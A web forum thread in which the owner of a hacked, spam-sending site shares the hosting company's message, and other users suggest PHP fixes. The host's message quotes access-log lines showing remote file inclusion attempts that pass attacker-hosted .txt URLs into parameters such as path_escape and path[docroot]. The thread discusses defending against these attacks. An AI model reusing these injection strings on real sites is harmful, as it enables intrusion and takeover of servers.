Hello,

The hosts suspended it because it was hacked and sending out spam. I hired someone on a freelance website to make the site. I dont have the skills to fix this myself.

Here is what the hosts said:

Quote:

We've had to suspend that account again. It looks like you have some php files that are vulnerable to cross-site scripting or remote file inclusion exploits, but we haven't been able to find the definite exact cause or file.

Because your site to attempting to flood our mail server with connections, we'll have to keep the site suspended 'till the issue is found.

Maybe the person who installed the site might be able where the following log entries are been called from:
/?path%5Bdocroot%5D=http://i0.co.kr/i0mall//admin/idxx.txt??
/config.inc.php?path_escape=http://www.ptp.dk/typo3/typo3conf/ext/rtehtmlarea/htmlarea/plugins/RemoveFormat/robots.txt??
/5/posts/2_Community/0/config.inc.php?path_escape=http://www.samilglass.com/images/v6id.txt???
/6//?path%5Bdocroot%5D=http://i0.co.kr/i0mall//admin/idxx.txt??
/6/errors.php?error=http://i0.co.kr/i0mall//admin/idxx.txt??
/6/posts//?path%5Bdocroot%5D=http://i0.co.kr/i0mall//admin/idxx.txt??
/6/posts/19_Eating_Local//?path%5Bdocroot%5D=http://i0.co.kr/i0mall//admin/idxx.txt??
/6/posts/19_Eating_Local/96_Fruit_Veg%20/config.inc.php?path_escape=http://www.samilglass.com/images/v6id.txt???
/6/posts/19_Eating_Local/96_Fruit_Veg/%20%20//?path%5Bdocroot%5D=http://i0.co.kr/i0mall//admin/idxx.txt??
/6/posts/19_Eating_Local/96_Fruit_Veg/%20%20/errors.php?error=http://i0.co.kr/i0mall//admin/idxx.txt??
/6/posts/19_Eating_Local/96_Fruit_Veg//?path%5Bdocroot%5D=http://i0.co.kr/i0mall//admin/idxx.txt??
/6/posts/19_Eating_Local/96_Fruit_Veg//config.inc.php?path_escape=http://www.ptp.dk/typo3/typo3conf/ext/rtehtmlarea/htmlarea/plugins/RemoveFormat/robots.txt??
/6/posts/19_Eating_Local/96_Fruit_Veg/config.inc.php?path_escape=http://www.samilglass.com/images/v6id.txt???
/6/posts/19_Eating_Local/96_Fruit_Veg/errors.php?error=http://i0.co.kr/i0mall//admin/idxx.txt??
/6/posts/19_Eating_Local/config.inc.php?path_escape=http://www.samilglass.com/images/v6id.txt???
/6/posts/19_Eating_Local/errors.php?error=http://i0.co.kr/i0mall//admin/idxx.txt??
/6/posts/errors.php?error=http://i0.co.kr/i0mall//admin/idxx.txt??
/config.inc.php?path_escape=http://www.samilglass.com/images/v6id.txt???
/index.php?news_id=3&start=0&category...t_id=0&arcy ear=&arcmonth=//config.inc.php?path_escape=http://www.ptp.dk/typo3/typo3conf/ext/rtehtmlarea/htmlarea/plugins/RemoveFormat/robots.txt??
/index.php?news_id=3&start=0&category...t_id=0&arcy ear=&arcmonth=/config.inc.php?path_escape=http://www.samilglass.com/images/v6id.txt???

If you could ask them what php files are called, when any of the above URL's are entered, it might help us track down the problem.

Only looking at the log, it's really hard to tell what the problem with your site is. It DOES look like there might be some remote file inclusion here, which could be causing you problems.

Check with your original programmer to see what he/she has to say.

if know you a little bit of php you can do this

on you php file that calls the other files put

PHP Code:

define("localOnly",True); 


then in all of you included files

PHP Code:

if(defined("localOnly") !== True){
echo "No direct access allowed";
exit();
} 


So when you include file it will check to see if var localOnly is defined and if it is it will run and if it isn't then it will exit. That should help from external inclusion but i would suggest using a creative name than what I provided.

The problem isn't with inclusion of local files from external sites, but with inclusion of external files from local site. If you look at the addresses that are referenced in the log file, you'll see that they contain PHP code. It is most likely being included on your site, causing vulnerabilities (the code is also crap by the way!).

I seriously suggest talking to your programmer about these issues as he/she is the best one to address them.